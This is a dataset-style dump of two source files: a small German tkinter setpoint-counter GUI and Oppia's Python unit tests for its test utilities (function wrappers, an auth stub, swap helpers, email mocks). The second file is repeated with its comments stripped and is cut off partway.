solltext_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", text="Sollwert")
sollwert_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", textvariable=sollwert)
isttext_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", text="Istwert")
istwert_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", textvariable=istwert)
confirm_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", text="Eingestellter Sollwert 0")
up_button = Button(master=window, bg=BGCOLOR, fg="white", text="Hochzaehlen", command=Hochzaehlen)
down_button = Button(master=window, bg=BGCOLOR, fg="white", text="Runterzaehlen", command=Runterzaehlen)
confirm_button = Button(master=window, bg=BGCOLOR, fg="white", text="Bestaetigen", command=Bestaetigen)
start_button = Button(master=window, bg=BGCOLOR, fg="white", text="Start", command=Starten)
exit_button = Button(master=window, bg=BGCOLOR, fg="white", text="X", command=window.destroy)
solltext_label.grid(row=0, column=0)
sollwert_label.grid(row=0, column=1)
up_button.grid(row=0, column=2)
down_button.grid(row=0, column=3)
confirm_button.grid(row=0, column=4)
start_button.grid(row=0, column=5)
confirm_label.grid(row=1, column=2)
isttext_label.grid(row=2, column=0)
istwert_label.grid(row=2, column=1)
exit_button.grid(row=4, column=5)
window.grid_columnconfigure(1, weight=1)
window.grid_rowconfigure(1, weight=1)
window.mainloop() | 32.421053 | 116 | 0.719968 |
from tkinter import *
BGCOLOR="#229"
def Hochzaehlen(event=None):
sollwert.set(sollwert.get() + 1)
def Runterzaehlen(event=None):
sollwert.set(sollwert.get() - 1)
def Bestaetigen():
bestaetigen = "Eingestellter Sollwert " + str(sollwert.get())
confirm_label.config(text=bestaetigen)
confirmed.set(True)
def Starten():
if confirmed.get() == True:
read_sensor_data(istwert_label)
def read_sensor_data(label):
istwert.set(istwert.get() + 1)
if istwert.get() == sollwert.get():
confirmed.set(False)
istwert.set(0)
else:
label.after(1000, read_sensor_data, label)
window = Tk()
w = window.winfo_screenwidth()
h = window.winfo_screenheight()
window.geometry(str(w) +"x"+ str(h) +"+0+0")
window.configure(background=BGCOLOR)
istwert = IntVar()
sollwert = IntVar()
confirmed = BooleanVar()
confirmed.set(False)
solltext_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", text="Sollwert")
sollwert_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", textvariable=sollwert)
isttext_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", text="Istwert")
istwert_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", textvariable=istwert)
confirm_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", text="Eingestellter Sollwert 0")
up_button = Button(master=window, bg=BGCOLOR, fg="white", text="Hochzaehlen", command=Hochzaehlen)
down_button = Button(master=window, bg=BGCOLOR, fg="white", text="Runterzaehlen", command=Runterzaehlen)
confirm_button = Button(master=window, bg=BGCOLOR, fg="white", text="Bestaetigen", command=Bestaetigen)
start_button = Button(master=window, bg=BGCOLOR, fg="white", text="Start", command=Starten)
exit_button = Button(master=window, bg=BGCOLOR, fg="white", text="X", command=window.destroy)
solltext_label.grid(row=0, column=0)
sollwert_label.grid(row=0, column=1)
up_button.grid(row=0, column=2)
down_button.grid(row=0, column=3)
confirm_button.grid(row=0, column=4)
start_button.grid(row=0, column=5)
confirm_label.grid(row=1, column=2)
isttext_label.grid(row=2, column=0)
istwert_label.grid(row=2, column=1)
exit_button.grid(row=4, column=5)
window.grid_columnconfigure(1, weight=1)
window.grid_rowconfigure(1, weight=1)
window.mainloop() | true | true |
f722fe1c14cd8415ba73037f18d4be1f4ad2e409 | 26,156 | py | Python | core/tests/test_utils_test.py | WebFlakyTest/oppia | 520e35490eae8171beb035fbafc2948983abec75 | [
"Apache-2.0"
] | 1 | 2021-08-17T20:33:12.000Z | 2021-08-17T20:33:12.000Z | core/tests/test_utils_test.py | WebFlakyTest/oppia | 520e35490eae8171beb035fbafc2948983abec75 | [
"Apache-2.0"
] | null | null | null | core/tests/test_utils_test.py | WebFlakyTest/oppia | 520e35490eae8171beb035fbafc2948983abec75 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS-IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for test_utils, mainly for the FunctionWrapper."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import logging
import os
import re
from constants import constants
from core import jobs
from core.domain import auth_domain
from core.domain import param_domain
from core.domain import taskqueue_services
from core.platform import models
from core.tests import test_utils
import python_utils
import mock
import webapp2
exp_models, = models.Registry.import_models([models.NAMES.exploration])
email_services = models.Registry.import_email_services()
class FunctionWrapperTests(test_utils.GenericTestBase):
"""Test for testing test_utils.FunctionWrapper."""
def test_wrapper_calls_subclass_methods(self):
"""Tests the basic functionality of FunctionWrapper."""
# Keeps track of which functions have been called, to test that
# pre_call_hook, the actual function, and post_call_hook are
# called in the right order.
order = []
testcase = self
class MockWrapper(test_utils.FunctionWrapper):
def pre_call_hook(self, args):
"""Mock pre call hook.
Args:
args: ArgumentParser. The specified arguments to be checked
with the mock names.
Raises:
AssertionError. The argument doesn't match with the mock
name.
"""
order.append('before')
testcase.assertEqual(args.get('posarg'), 'foo')
testcase.assertEqual(args.get('kwarg'), 'bar')
def post_call_hook(self, args, result):
"""Mock post call hook.
Args:
args: ArgumentParser. The specified arguments to be checked
with the mock names.
result: str. The string to be checked with the mock name.
Raises:
AssertionError. The argument doesn't match with the mock
name.
"""
order.append('after')
testcase.assertEqual(result, 'foobar')
testcase.assertEqual(args.get('posarg'), 'foo')
testcase.assertEqual(args.get('kwarg'), 'bar')
def mock_function(posarg, kwarg):
order.append('call')
return posarg + kwarg
wrapped = MockWrapper(mock_function)
self.assertEqual(wrapped('foo', kwarg='bar'), 'foobar')
self.assertEqual(order, ['before', 'call', 'after'])
def test_wrapper_calls_passed_method(self):
"""Tests that FunctionWrapper also works for methods."""
data = {}
class MockClass(python_utils.OBJECT):
def __init__(self, num1):
self.num1 = num1
def mock_method(self, num2):
data['value'] = self.num1 + num2
return (self.num1 + num2) * 2
wrapped = test_utils.FunctionWrapper(MockClass.mock_method)
with self.swap(MockClass, 'mock_method', wrapped):
val = MockClass('foo').mock_method('bar')
self.assertEqual(val, 'foobarfoobar')
self.assertEqual(data.get('value'), 'foobar')
def test_wrapper_calls_passed_class_method(self):
"""Tests that FunctionWrapper also works for class methods."""
data = {}
class MockClass(python_utils.OBJECT):
str_attr = 'foo'
@classmethod
def mock_classmethod(cls, num):
data['value'] = cls.str_attr + num
return (cls.str_attr + num) * 2
wrapped = test_utils.FunctionWrapper(MockClass.mock_classmethod)
with self.swap(MockClass, 'mock_classmethod', wrapped):
val = MockClass.mock_classmethod('bar')
self.assertEqual(val, 'foobarfoobar')
self.assertEqual(data.get('value'), 'foobar')
def test_wrapper_calls_passed_static_method(self):
"""Tests that FunctionWrapper also works for static methods."""
data = {}
class MockClass(python_utils.OBJECT):
@staticmethod
def mock_staticmethod(num):
data['value'] = num
return num * 2
wrapped = test_utils.FunctionWrapper(MockClass.mock_staticmethod)
with self.swap(MockClass, 'mock_staticmethod', wrapped):
val = MockClass.mock_staticmethod('foobar')
self.assertEqual(val, 'foobarfoobar')
self.assertEqual(data.get('value'), 'foobar')
def test_wrapper_calls_passed_lambdas(self):
data = {}
def mock_function_with_side_effect(num):
data['value'] = num
return num
mock_lambda = lambda x: mock_function_with_side_effect(x) * 2
wrapped = test_utils.FunctionWrapper(mock_lambda)
self.assertEqual(wrapped('foobar'), 'foobarfoobar')
self.assertEqual(data.get('value'), 'foobar')
def test_pre_call_hook_does_nothing(self):
function = lambda x: x ** 2
wrapped = test_utils.FunctionWrapper(function)
self.assertIsNone(wrapped.pre_call_hook('args'))
class AuthServicesStubTests(test_utils.GenericTestBase):
EMAIL = 'user@test.com'
def setUp(self):
super(AuthServicesStubTests, self).setUp()
self.stub = test_utils.AuthServicesStub()
def test_get_auth_claims_from_request(self):
request = webapp2.Request.blank('/')
self.assertIsNone(self.stub.get_auth_claims_from_request(request))
with self.login_context(self.EMAIL):
self.assertEqual(
self.stub.get_auth_claims_from_request(request),
auth_domain.AuthClaims(
self.get_auth_id_from_email(self.EMAIL), self.EMAIL, False))
with self.super_admin_context():
self.assertEqual(
self.stub.get_auth_claims_from_request(request),
auth_domain.AuthClaims(
self.get_auth_id_from_email(self.SUPER_ADMIN_EMAIL),
self.SUPER_ADMIN_EMAIL,
True))
self.assertIsNone(self.stub.get_auth_claims_from_request(request))
def test_get_association_that_is_present(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid', 'uid'))
self.assertEqual(self.stub.get_user_id_from_auth_id('aid'), 'uid')
self.assertEqual(self.stub.get_auth_id_from_user_id('uid'), 'aid')
def test_get_association_that_is_missing(self):
self.assertIsNone(self.stub.get_user_id_from_auth_id('does_not_exist'))
self.assertIsNone(self.stub.get_auth_id_from_user_id('does_not_exist'))
def test_get_multi_associations_with_all_present(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid1', 'uid1'))
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid2', 'uid2'))
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid3', 'uid3'))
self.assertEqual(
self.stub.get_multi_user_ids_from_auth_ids(
['aid1', 'aid2', 'aid3']),
['uid1', 'uid2', 'uid3'])
self.assertEqual(
self.stub.get_multi_auth_ids_from_user_ids(
['uid1', 'uid2', 'uid3']),
['aid1', 'aid2', 'aid3'])
def test_get_multi_associations_with_one_missing(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid1', 'uid1'))
# The aid2 <-> uid2 association is missing.
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid3', 'uid3'))
self.assertEqual(
self.stub.get_multi_user_ids_from_auth_ids(
['aid1', 'aid2', 'aid3']),
['uid1', None, 'uid3'])
self.assertEqual(
self.stub.get_multi_auth_ids_from_user_ids(
['uid1', 'uid2', 'uid3']),
['aid1', None, 'aid3'])
def test_associate_auth_id_with_user_id_without_collision(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid', 'uid'))
self.assertEqual(self.stub.get_user_id_from_auth_id('aid'), 'uid')
self.assertEqual(self.stub.get_auth_id_from_user_id('uid'), 'aid')
def test_associate_auth_id_with_user_id_with_collision_raises(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid', 'uid'))
with self.assertRaisesRegexp(Exception, 'already associated'):
self.stub.associate_auth_id_with_user_id(
auth_domain.AuthIdUserIdPair('aid', 'uid'))
def test_associate_multi_auth_ids_with_user_ids_without_collisions(self):
self.stub.associate_multi_auth_ids_with_user_ids(
[auth_domain.AuthIdUserIdPair('aid1', 'uid1'),
auth_domain.AuthIdUserIdPair('aid2', 'uid2'),
auth_domain.AuthIdUserIdPair('aid3', 'uid3')])
self.assertEqual(
[self.stub.get_user_id_from_auth_id('aid1'),
self.stub.get_user_id_from_auth_id('aid2'),
self.stub.get_user_id_from_auth_id('aid3')],
['uid1', 'uid2', 'uid3'])
def test_associate_multi_auth_ids_with_user_ids_with_collision_raises(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid1', 'uid1'))
with self.assertRaisesRegexp(Exception, 'already associated'):
self.stub.associate_multi_auth_ids_with_user_ids(
[auth_domain.AuthIdUserIdPair('aid1', 'uid1'),
auth_domain.AuthIdUserIdPair('aid2', 'uid2'),
auth_domain.AuthIdUserIdPair('aid3', 'uid3')])
def test_present_association_is_not_considered_to_be_deleted(self):
# This operation creates the external auth association.
self.stub.associate_auth_id_with_user_id(
auth_domain.AuthIdUserIdPair('aid', 'uid'))
self.assertFalse(
self.stub.verify_external_auth_associations_are_deleted('uid'))
def test_missing_association_is_considered_to_be_deleted(self):
self.assertTrue(self.stub.verify_external_auth_associations_are_deleted(
'does_not_exist'))
def test_delete_association_when_it_is_present(self):
# This operation creates the external auth association.
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid', 'uid'))
self.assertFalse(
self.stub.verify_external_auth_associations_are_deleted('uid'))
self.stub.delete_external_auth_associations('uid')
self.assertTrue(
self.stub.verify_external_auth_associations_are_deleted('uid'))
def test_delete_association_when_it_is_missing_does_not_raise(self):
# Should not raise.
self.stub.delete_external_auth_associations('does_not_exist')
class CallCounterTests(test_utils.GenericTestBase):
def test_call_counter_counts_the_number_of_times_a_function_gets_called(
self):
f = lambda x: x ** 2
wrapped_function = test_utils.CallCounter(f)
self.assertEqual(wrapped_function.times_called, 0)
for i in python_utils.RANGE(5):
self.assertEqual(wrapped_function(i), i ** 2)
self.assertEqual(wrapped_function.times_called, i + 1)
class FailingFunctionTests(test_utils.GenericTestBase):
def test_failing_function_never_succeeds_when_n_is_infinity(self):
class MockError(Exception):
pass
function = lambda x: x ** 2
failing_func = test_utils.FailingFunction(
function, MockError('Dummy Exception'),
test_utils.FailingFunction.INFINITY)
for i in python_utils.RANGE(20):
with self.assertRaisesRegexp(MockError, 'Dummy Exception'):
failing_func(i)
def test_failing_function_raises_error_with_invalid_num_tries(self):
class MockError(Exception):
pass
function = lambda x: x ** 2
with self.assertRaisesRegexp(
ValueError,
'num_tries_before_success should either be an integer greater than '
'or equal to 0, or FailingFunction.INFINITY'):
test_utils.FailingFunction(function, MockError, -1)
class FailingMapReduceJobManager(jobs.BaseMapReduceJobManager):
"""Test job that fails because map is a classmethod."""
@classmethod
def entity_classes_to_map_over(cls):
return []
@classmethod
def map(cls):
pass
class TestUtilsTests(test_utils.GenericTestBase):
def test_failing_job(self):
self.assertIsNone(FailingMapReduceJobManager.map())
job_id = FailingMapReduceJobManager.create_new()
FailingMapReduceJobManager.enqueue(
job_id, taskqueue_services.QUEUE_NAME_DEFAULT)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(None), 1)
self.assertRaisesRegexp(
RuntimeError, 'MapReduce task failed: Task<.*>',
self.process_and_flush_pending_mapreduce_tasks)
def test_get_static_asset_url(self):
asset_url = self.get_static_asset_url('/images/subjects/Lightbulb.svg')
self.assertEqual(asset_url, '/assets/images/subjects/Lightbulb.svg')
def test_get_static_asset_filepath_with_prod_mode_on(self):
with self.swap(constants, 'DEV_MODE', False):
filepath = self.get_static_asset_filepath()
self.assertEqual(filepath, 'build')
def test_cannot_get_updated_param_dict_with_invalid_param_name(self):
param_change_list = [
param_domain.ParamChange(
'a', 'Copier', {
'value': 'firstValue', 'parse_with_jinja': False
}
)
]
exp_param_specs = {
'b': param_domain.ParamSpec('UnicodeString'),
}
with self.assertRaisesRegexp(Exception, 'Parameter a not found'):
self.get_updated_param_dict(
{}, param_change_list, exp_param_specs)
def test_cannot_save_new_linear_exp_with_no_state_name(self):
with self.assertRaisesRegexp(
ValueError, 'must provide at least one state name'):
self.save_new_linear_exp_with_state_names_and_interactions(
'exp_id', 'owner_id', [], ['interaction_id'])
def test_cannot_save_new_linear_exp_with_no_interaction_id(self):
with self.assertRaisesRegexp(
ValueError, 'must provide at least one interaction type'):
self.save_new_linear_exp_with_state_names_and_interactions(
'exp_id', 'owner_id', ['state_name'], [])
def test_cannot_perform_delete_json_with_non_dict_params(self):
with self.assertRaisesRegexp(
Exception, 'Expected params to be a dict'):
self.delete_json('random_url', params='invalid_params')
def test_cannot_get_response_with_non_dict_params(self):
with self.assertRaisesRegexp(
Exception, 'Expected params to be a dict'):
self.get_response_without_checking_for_errors(
'random_url', [200], params='invalid_params')
def test_capture_logging(self):
logging.info('0')
with self.capture_logging() as logs:
logging.info('1')
logging.debug('2')
logging.warn('3')
logging.error('4')
python_utils.PRINT('5')
logging.info('6')
self.assertEqual(logs, ['1', '2', '3', '4'])
def test_capture_logging_with_min_level(self):
logging.info('0')
with self.capture_logging(min_level=logging.WARN) as logs:
logging.info('1')
logging.debug('2')
logging.warn('3')
logging.error('4')
python_utils.PRINT('5')
logging.error('6')
self.assertEqual(logs, ['3', '4'])
def test_swap_to_always_return_without_value_uses_none(self):
obj = mock.Mock()
obj.func = lambda: obj
self.assertIs(obj.func(), obj)
with self.swap_to_always_return(obj, 'func'):
self.assertIsNone(obj.func())
def test_swap_to_always_return_with_value(self):
obj = mock.Mock()
obj.func = lambda: 0
self.assertEqual(obj.func(), 0)
with self.swap_to_always_return(obj, 'func', value=123):
self.assertEqual(obj.func(), 123)
def test_swap_to_always_raise_without_error_uses_empty_exception(self):
obj = mock.Mock()
obj.func = lambda: None
self.assertIsNone(obj.func())
with self.swap_to_always_raise(obj, 'func'):
try:
obj.func()
except Exception as e:
self.assertIs(type(e), Exception)
self.assertEqual(python_utils.UNICODE(e), '')
else:
self.fail(msg='obj.func() did not raise an Exception')
def test_swap_to_always_raise_with_error(self):
obj = mock.Mock()
obj.func = lambda: python_utils.divide(1, 0)
self.assertRaisesRegexp(
ZeroDivisionError, 'integer division or modulo by zero', obj.func)
with self.swap_to_always_raise(obj, 'func', error=ValueError('abc')):
self.assertRaisesRegexp(ValueError, 'abc', obj.func)
def test_swap_with_check_on_method_called(self):
def mock_getcwd():
return
getcwd_swap = self.swap_with_checks(os, 'getcwd', mock_getcwd)
with getcwd_swap:
SwapWithCheckTestClass.getcwd_function_without_args()
def test_swap_with_check_on_called_failed(self):
def mock_getcwd():
return
getcwd_swap = self.swap_with_checks(os, 'getcwd', mock_getcwd)
with self.assertRaisesRegexp(AssertionError, r'os\.getcwd'):
with getcwd_swap:
SwapWithCheckTestClass.empty_function_without_args()
def test_swap_with_check_on_not_called(self):
def mock_getcwd():
return
getcwd_swap = self.swap_with_checks(
os, 'getcwd', mock_getcwd, called=False)
with getcwd_swap:
SwapWithCheckTestClass.empty_function_without_args()
def test_swap_with_check_on_not_called_failed(self):
def mock_getcwd():
return
getcwd_swap = self.swap_with_checks(
os, 'getcwd', mock_getcwd)
with self.assertRaisesRegexp(AssertionError, r'os\.getcwd'):
with getcwd_swap:
SwapWithCheckTestClass.empty_function_without_args()
def test_swap_with_check_on_expected_args(self):
def mock_getenv(unused_env):
return
def mock_join(*unused_args):
return
getenv_swap = self.swap_with_checks(
os, 'getenv', mock_getenv, expected_args=[('123',), ('456',)])
join_swap = self.swap_with_checks(
os.path, 'join', mock_join, expected_args=[('first', 'second')])
with getenv_swap, join_swap:
SwapWithCheckTestClass.functions_with_args()
def test_swap_with_check_on_expected_args_failed_on_run_sequence(self):
def mock_getenv(unused_env):
return
def mock_join(*unused_args):
return
getenv_swap = self.swap_with_checks(
os, 'getenv', mock_getenv, expected_args=[('456',), ('123',)])
join_swap = self.swap_with_checks(
os.path, 'join', mock_join, expected_args=[('first', 'second')])
with self.assertRaisesRegexp(AssertionError, r'os\.getenv'):
with getenv_swap, join_swap:
SwapWithCheckTestClass.functions_with_args()
def test_swap_with_check_on_expected_args_failed_on_wrong_args_number(self):
def mock_getenv(unused_env):
return
def mock_join(*unused_args):
return
getenv_swap = self.swap_with_checks(
os, 'getenv', mock_getenv, expected_args=[('123',), ('456',)])
join_swap = self.swap_with_checks(
os.path, 'join', mock_join, expected_args=[
('first', 'second'), ('third', 'forth')])
with self.assertRaisesRegexp(AssertionError, r'join'):
with getenv_swap, join_swap:
SwapWithCheckTestClass.functions_with_args()
def test_swap_with_check_on_expected_kwargs(self):
def mock_getenv(key, default): # pylint: disable=unused-argument
return
getenv_swap = self.swap_with_checks(
os, 'getenv', mock_getenv,
expected_args=[('123',), ('678',)],
expected_kwargs=[{'default': '456'}, {'default': '900'}])
with getenv_swap:
SwapWithCheckTestClass.functions_with_kwargs()
def test_swap_with_check_on_expected_kwargs_failed_on_wrong_numbers(self):
def mock_getenv(key, default): # pylint: disable=unused-argument
return
getenv_swap = self.swap_with_checks(
os, 'getenv', mock_getenv, expected_kwargs=[
{'key': '123', 'default': '456'},
{'key': '678', 'default': '900'},
{'key': '678', 'default': '900'},
])
with self.assertRaisesRegexp(AssertionError, r'os\.getenv'):
with getenv_swap:
SwapWithCheckTestClass.functions_with_kwargs()
def test_swap_with_check_on_capature_exception_raised_by_tested_function(
self):
def mock_getcwd():
raise ValueError('Exception raised from getcwd()')
getcwd_swap = self.swap_with_checks(os, 'getcwd', mock_getcwd)
with self.assertRaisesRegexp(
ValueError, re.escape('Exception raised from getcwd()')
):
with getcwd_swap:
SwapWithCheckTestClass.getcwd_function_without_args()
def test_assert_raises_with_error_message(self):
def mock_exception_func():
raise Exception()
with self.assertRaisesRegexp(
NotImplementedError,
'self.assertRaises should not be used in these tests. Please use '
'self.assertRaisesRegexp instead.'):
self.assertRaises(Exception, mock_exception_func)
def test_assert_raises_regexp_with_empty_string(self):
def mock_exception_func():
raise Exception()
with self.assertRaisesRegexp(
Exception,
'Please provide a sufficiently strong regexp string to '
'validate that the correct error is being raised.'):
self.assertRaisesRegexp(Exception, '', mock_exception_func)
class EmailMockTests(test_utils.EmailTestBase):
"""Class for testing EmailTestBase."""
def test_override_run_swaps_contexts(self):
"""Test that the current_function
email_services.send_email_to_recipients() is correctly swapped to its
mock version when the testbase extends EmailTestBase.
"""
referenced_function = getattr(
email_services, 'send_email_to_recipients')
correct_function = getattr(self, '_send_email_to_recipients')
self.assertEqual(referenced_function, correct_function)
def test_mock_send_email_to_recipients_sends_correct_emails(self):
"""Test sending email to recipients using mock adds the correct objects
to emails_dict.
"""
self._send_email_to_recipients(
'a@a.com',
['b@b.com'],
(
'Hola 😂 - invitation to collaborate'
.encode(encoding='utf-8')),
'plaintext_body 😂'.encode(encoding='utf-8'),
'Hi abc,<br> 😂'.encode(encoding='utf-8'),
bcc=['c@c.com'],
reply_to='abc',
recipient_variables={'b@b.com': {'first': 'Bob', 'id': 1}})
messages = self._get_sent_email_messages(
'b@b.com')
all_messages = self._get_all_sent_email_messages()
self.assertEqual(len(messages), 1)
self.assertEqual(len(all_messages), 1)
self.assertEqual(all_messages['b@b.com'], messages)
self.assertEqual(
messages[0].subject,
'Hola 😂 - invitation to collaborate'.encode(encoding='utf-8'))
self.assertEqual(
messages[0].body,
'plaintext_body 😂'.encode(encoding='utf-8'))
self.assertEqual(
messages[0].html,
'Hi abc,<br> 😂'.encode(encoding='utf-8'))
self.assertEqual(messages[0].bcc, 'c@c.com')
class SwapWithCheckTestClass(python_utils.OBJECT):
"""Dummy class for testing check_with_swap. This class stores a few dummy
functions.
"""
@classmethod
def getcwd_function_without_args(cls):
"""Run getcwd function."""
os.getcwd()
@classmethod
def empty_function_without_args(cls):
"""Empty function."""
pass
@classmethod
def functions_with_args(cls):
"""Run a few functions with args."""
os.getenv('123')
os.getenv('456')
os.path.join('first', 'second')
@classmethod
def functions_with_kwargs(cls):
"""Run a few functions with kwargs."""
os.getenv('123', default='456')
os.getenv('678', default='900')
| 37.365714 | 80 | 0.639586 |
from __future__ import absolute_import
from __future__ import unicode_literals
import logging
import os
import re
from constants import constants
from core import jobs
from core.domain import auth_domain
from core.domain import param_domain
from core.domain import taskqueue_services
from core.platform import models
from core.tests import test_utils
import python_utils
import mock
import webapp2
exp_models, = models.Registry.import_models([models.NAMES.exploration])
email_services = models.Registry.import_email_services()
class FunctionWrapperTests(test_utils.GenericTestBase):
def test_wrapper_calls_subclass_methods(self):
order = []
testcase = self
class MockWrapper(test_utils.FunctionWrapper):
def pre_call_hook(self, args):
order.append('before')
testcase.assertEqual(args.get('posarg'), 'foo')
testcase.assertEqual(args.get('kwarg'), 'bar')
def post_call_hook(self, args, result):
order.append('after')
testcase.assertEqual(result, 'foobar')
testcase.assertEqual(args.get('posarg'), 'foo')
testcase.assertEqual(args.get('kwarg'), 'bar')
def mock_function(posarg, kwarg):
order.append('call')
return posarg + kwarg
wrapped = MockWrapper(mock_function)
self.assertEqual(wrapped('foo', kwarg='bar'), 'foobar')
self.assertEqual(order, ['before', 'call', 'after'])
def test_wrapper_calls_passed_method(self):
data = {}
class MockClass(python_utils.OBJECT):
def __init__(self, num1):
self.num1 = num1
def mock_method(self, num2):
data['value'] = self.num1 + num2
return (self.num1 + num2) * 2
wrapped = test_utils.FunctionWrapper(MockClass.mock_method)
with self.swap(MockClass, 'mock_method', wrapped):
val = MockClass('foo').mock_method('bar')
self.assertEqual(val, 'foobarfoobar')
self.assertEqual(data.get('value'), 'foobar')
def test_wrapper_calls_passed_class_method(self):
data = {}
class MockClass(python_utils.OBJECT):
str_attr = 'foo'
@classmethod
def mock_classmethod(cls, num):
data['value'] = cls.str_attr + num
return (cls.str_attr + num) * 2
wrapped = test_utils.FunctionWrapper(MockClass.mock_classmethod)
with self.swap(MockClass, 'mock_classmethod', wrapped):
val = MockClass.mock_classmethod('bar')
self.assertEqual(val, 'foobarfoobar')
self.assertEqual(data.get('value'), 'foobar')
def test_wrapper_calls_passed_static_method(self):
data = {}
class MockClass(python_utils.OBJECT):
@staticmethod
def mock_staticmethod(num):
data['value'] = num
return num * 2
wrapped = test_utils.FunctionWrapper(MockClass.mock_staticmethod)
with self.swap(MockClass, 'mock_staticmethod', wrapped):
val = MockClass.mock_staticmethod('foobar')
self.assertEqual(val, 'foobarfoobar')
self.assertEqual(data.get('value'), 'foobar')
def test_wrapper_calls_passed_lambdas(self):
data = {}
def mock_function_with_side_effect(num):
data['value'] = num
return num
mock_lambda = lambda x: mock_function_with_side_effect(x) * 2
wrapped = test_utils.FunctionWrapper(mock_lambda)
self.assertEqual(wrapped('foobar'), 'foobarfoobar')
self.assertEqual(data.get('value'), 'foobar')
def test_pre_call_hook_does_nothing(self):
function = lambda x: x ** 2
wrapped = test_utils.FunctionWrapper(function)
self.assertIsNone(wrapped.pre_call_hook('args'))
class AuthServicesStubTests(test_utils.GenericTestBase):
EMAIL = 'user@test.com'
def setUp(self):
super(AuthServicesStubTests, self).setUp()
self.stub = test_utils.AuthServicesStub()
def test_get_auth_claims_from_request(self):
request = webapp2.Request.blank('/')
self.assertIsNone(self.stub.get_auth_claims_from_request(request))
with self.login_context(self.EMAIL):
self.assertEqual(
self.stub.get_auth_claims_from_request(request),
auth_domain.AuthClaims(
self.get_auth_id_from_email(self.EMAIL), self.EMAIL, False))
with self.super_admin_context():
self.assertEqual(
self.stub.get_auth_claims_from_request(request),
auth_domain.AuthClaims(
self.get_auth_id_from_email(self.SUPER_ADMIN_EMAIL),
self.SUPER_ADMIN_EMAIL,
True))
self.assertIsNone(self.stub.get_auth_claims_from_request(request))
def test_get_association_that_is_present(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid', 'uid'))
self.assertEqual(self.stub.get_user_id_from_auth_id('aid'), 'uid')
self.assertEqual(self.stub.get_auth_id_from_user_id('uid'), 'aid')
def test_get_association_that_is_missing(self):
self.assertIsNone(self.stub.get_user_id_from_auth_id('does_not_exist'))
self.assertIsNone(self.stub.get_auth_id_from_user_id('does_not_exist'))
def test_get_multi_associations_with_all_present(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid1', 'uid1'))
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid2', 'uid2'))
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid3', 'uid3'))
self.assertEqual(
self.stub.get_multi_user_ids_from_auth_ids(
['aid1', 'aid2', 'aid3']),
['uid1', 'uid2', 'uid3'])
self.assertEqual(
self.stub.get_multi_auth_ids_from_user_ids(
['uid1', 'uid2', 'uid3']),
['aid1', 'aid2', 'aid3'])
def test_get_multi_associations_with_one_missing(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid1', 'uid1'))
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid3', 'uid3'))
self.assertEqual(
self.stub.get_multi_user_ids_from_auth_ids(
['aid1', 'aid2', 'aid3']),
['uid1', None, 'uid3'])
self.assertEqual(
self.stub.get_multi_auth_ids_from_user_ids(
['uid1', 'uid2', 'uid3']),
['aid1', None, 'aid3'])
def test_associate_auth_id_with_user_id_without_collision(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid', 'uid'))
self.assertEqual(self.stub.get_user_id_from_auth_id('aid'), 'uid')
self.assertEqual(self.stub.get_auth_id_from_user_id('uid'), 'aid')
def test_associate_auth_id_with_user_id_with_collision_raises(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid', 'uid'))
with self.assertRaisesRegexp(Exception, 'already associated'):
self.stub.associate_auth_id_with_user_id(
auth_domain.AuthIdUserIdPair('aid', 'uid'))
def test_associate_multi_auth_ids_with_user_ids_without_collisions(self):
self.stub.associate_multi_auth_ids_with_user_ids(
[auth_domain.AuthIdUserIdPair('aid1', 'uid1'),
auth_domain.AuthIdUserIdPair('aid2', 'uid2'),
auth_domain.AuthIdUserIdPair('aid3', 'uid3')])
self.assertEqual(
[self.stub.get_user_id_from_auth_id('aid1'),
self.stub.get_user_id_from_auth_id('aid2'),
self.stub.get_user_id_from_auth_id('aid3')],
['uid1', 'uid2', 'uid3'])
def test_associate_multi_auth_ids_with_user_ids_with_collision_raises(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid1', 'uid1'))
